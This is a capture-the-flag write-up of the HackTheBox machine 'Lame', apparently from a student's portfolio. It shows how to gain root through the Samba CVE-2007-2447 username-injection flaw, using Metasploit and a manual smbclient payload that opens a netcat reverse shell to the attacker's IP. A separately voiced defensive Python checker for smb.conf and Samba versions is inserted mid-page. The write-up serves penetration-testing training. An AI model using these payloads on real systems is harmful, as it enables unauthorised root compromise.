N E T H R A N. W E D A G E

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

HTB: Lame

10 Mar 2024 Linux 20 pts Easy

Classic Easy Linux box. Exploited a vulnerable Samba service to gain direct root access. Full walkthrough covering enumeration, exploitation and post-exploitation.

HTB: Lame — Full Writeup

Lame is one of the first machines on HackTheBox and a classic starting point for beginners. It runs a vulnerable version of Samba that allows unauthenticated remote code execution directly as root — no privilege escalation needed.

Machine Info

  • OS: Linux (Ubuntu)
  • Difficulty: Easy
  • IP: 10.10.10.3
  • Key Vulnerability: Samba 3.0.20 — CVE-2007-2447 (Username Map Script)

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and service versions:

nmap -sV -sC -p- --min-rate 5000 10.10.10.3

Key results from the scan:

  • Port 21 — vsftpd 2.3.4 (anonymous login allowed)
  • Port 22 — OpenSSH 4.7p1
  • Port 139 / 445 — Samba smbd 3.0.20-Debian
  • Port 3632 — distccd v1

Two interesting services stand out: vsftpd 2.3.4 (has a known backdoor) and Samba 3.0.20 (CVE-2007-2447). We'll try Samba first since it gives direct root access.

Step 2 — Samba Enumeration

Check available shares with smbclient:

smbclient -L //10.10.10.3 -N

The output lists several shares, including tmp, which is accessible anonymously:

smbclient //10.10.10.3/tmp -N

We can connect. Samba 3.0.20 is vulnerable to CVE-2007-2447, the "username map script" command injection. When Samba passes a client-supplied username containing shell metacharacters to the configured username map script, the embedded command runs as root, because the script is invoked through a shell with the username substituted in unescaped.
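As an added defender-side check (not part of the writeup, and not Samba's own code), the following script audits a constructed smb.conf fragment for an active `username map script` setting, classifies a Samba banner against the CVE-2007-2447 version range, and flags usernames that carry the shell metacharacters the injection depends on. The upper bound of the affected range (fixed in 3.0.25) is taken from the Samba advisory, not from this page.

```python
import re
from typing import List, Optional, Tuple

# Constructed smb.conf fragment (not taken from the box). The risky setting is
# "username map script": Samba 3.0.20 ran it through a shell with the client
# supplied username substituted in unescaped, which is CVE-2007-2447.
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/scripts/old.sh   (commented out, ignored)
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
"""

# Characters that let a username break out of the script's shell command line.
SHELL_META = re.compile(r"[`$;|&<>()\n]")
VERSION_RE = re.compile(r"Samba\s+(?:smbd\s+)?(\d+)\.(\d+)\.(\d+)")

def find_username_map_script(conf: str) -> List[str]:
    """Return every active (uncommented) 'username map script' value in smb.conf text."""
    hits = []
    for line in conf.splitlines():
        if line.lstrip().startswith((";", "#")):
            continue  # smb.conf comment, not an active setting
        m = re.match(r"\s*username\s+map\s+script\s*=\s*(.+?)\s*$", line, re.I)
        if m:
            hits.append(m.group(1))
    return hits

def parse_samba_version(banner: str) -> Optional[Tuple[int, ...]]:
    """Pull (major, minor, patch) out of a banner such as 'Samba smbd 3.0.20-Debian'."""
    m = VERSION_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None

def samba_version_vulnerable(banner: str) -> bool:
    """True for the CVE-2007-2447 range: 3.0.0 up to, but not including, 3.0.25
    (upper bound from the Samba advisory; an assumption not stated in the writeup)."""
    v = parse_samba_version(banner)
    return v is not None and (3, 0, 0) <= v < (3, 0, 25)

def username_has_shell_meta(username: str) -> bool:
    """Input check a map-script wrapper should apply before touching a username."""
    return SHELL_META.search(username) is not None
```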

Step 3 — Exploitation (Metasploit)

Load the Metasploit module for this vulnerability:

msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.X   # your tun0 IP
set LPORT 4444
run

Metasploit connects back with a shell. Check who we are:

id
uid=0(root) gid=0(root) groups=0(root)

Direct root — no privilege escalation needed.

Step 4 — Exploitation (Manual, no Metasploit)

The same exploit can be done manually using smbclient. Set up a Netcat listener first:

nc -lvnp 4444

Then connect via smbclient and inject the payload into the username field:

smbclient //10.10.10.3/tmp -N
logon "./=`nohup nc -e /bin/bash 10.10.14.X 4444`"

The backtick command injection executes, and your listener receives a root shell.

Step 5 — Flags

With a root shell, grab both flags:

# User flag
cat /home/makis/user.txt

# Root flag
cat /root/root.txt

Bonus — vsftpd 2.3.4 Backdoor

The FTP service on port 21 runs vsftpd 2.3.4 which has a backdoor (CVE-2011-2523). Triggering it opens a shell on port 6200. However, on this machine the backdoor appears patched or firewalled — it does not work. The Samba exploit is the reliable path.

# Attempt (will likely fail on Lame)
nmap -p 6200 10.10.10.3
# or
use exploit/unix/ftp/vsftpd_234_backdoor

Key Takeaways

  • Always check Samba versions — older versions are frequently exploitable
  • CVE-2007-2447 requires no authentication and gives direct root
  • The username map script option in Samba allows arbitrary command injection via username fields
  • Manual exploitation using smbclient avoids relying on Metasploit — good practice for OSCP
  • distccd on port 3632 is also exploitable (CVE-2004-2687) as an alternate path

Tools Used

  • nmap — port scanning and service enumeration
  • smbclient — SMB share enumeration and manual exploitation
  • Metasploit — exploit/multi/samba/usermap_script
  • netcat — reverse shell listener